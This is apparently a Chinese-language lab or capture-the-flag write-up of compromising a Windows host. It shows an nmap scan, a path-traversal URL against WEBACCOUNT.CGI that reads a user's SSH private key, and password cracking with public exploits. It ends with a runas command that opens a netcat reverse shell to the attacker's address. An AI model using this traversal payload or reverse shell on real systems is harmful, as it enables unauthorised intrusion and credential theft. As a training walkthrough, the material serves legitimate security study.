nmap
┌──(root㉿kali)-[~/lab]
└─# nmap -p- -A -sS 192.168.219.179
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-15 04:22 UTC
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 34.76% done; ETC: 04:23 (0:00:41 remaining)
Stats: 0:05:25 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 91.67% done; ETC: 04:28 (0:00:06 remaining)
Stats: 0:06:24 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 91.67% done; ETC: 04:29 (0:00:11 remaining)
Stats: 0:07:11 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 04:29 (0:00:00 remaining)
Nmap scan report for 192.168.219.179
Host is up (0.071s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh Bitvise WinSSHD 8.48 (FlowSsh 8.48; protocol 2.0; non-commercial use)
| ssh-hostkey:
| 3072 21:25:f0:53:b4:99:0f:34:de:2d:ca:bc:5d:fe:20:ce (RSA)
|_ 384 e7:96:f3:6a:d8:92:07:5a:bf:37:06:86:0a:31:73:19 (ECDSA)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
7680/tcp open tcpwrapped
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/15%OT=22%CT=1%CU=34975%PV=Y%DS=4%DC=T%G=Y%TM=675
OS:E5B59%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10D%TI=I%CI=I%TS=U)SEQ(S
OS:P=FE%GCD=2%ISR=10D%TI=I%CI=I%TS=U)OPS(O1=M578NW8NNS%O2=M578NW8NNS%O3=M57
OS:8NW8%O4=M578NW8NNS%O5=M578NW8NNS%O6=M578NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%
OS:W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M578NW8NNS%CC=N%Q=)T1
OS:(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(
OS:R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)Network Distance: 4 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-time:
| date: 2024-12-15T04:29:51
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not requiredTRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 69.49 ms 192.168.45.1
2 69.47 ms 192.168.45.254
3 70.57 ms 192.168.251.1
4 71.20 ms 192.168.219.179OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 459.68 seconds访问8080端口
更具cms名字搜索exp
发现存在任意读取漏洞
https://www.exploit-db.com/exploits/45296
但是我们要怎么利用呢
同时我们还看到两个用户
联想的他的ssh是开放的
那我们是不是可以直接读取他的ssh秘钥呢
试试看吧
http://192.168.219.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers\viewer\.ssh\id_rsa&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=
读取成功
ssh登录成功
好了遇到了提权环节了
我们又找到一个 关于提权的exp
https://www.exploit-db.com/exploits/45312
他的描述 是要替换该文件gsm_codec.dll
我们看看我们有没有写入权限吧
好像不太行
那怎么办呢
我们还找到一个exp
https://www.exploit-db.com/exploits/50130
这个exp是用来破解密码的
更具exp的描述我们定位一下加密密码的位置
发现了两个密码
我们将密码写入脚本 尝试破解密码
14WatchD0g? 最后那个问号是特殊字符 我们需要去猜 应为作者没写完善
ImWatchingY0u
有了密码我们能干啥呢
尝试runas 命令
经过不断地尝试发现密码是14WatchD0g$
直接反弹shell
runas /user:administrator "nc -e cmd 192.168.45.250 8080"
提权成功
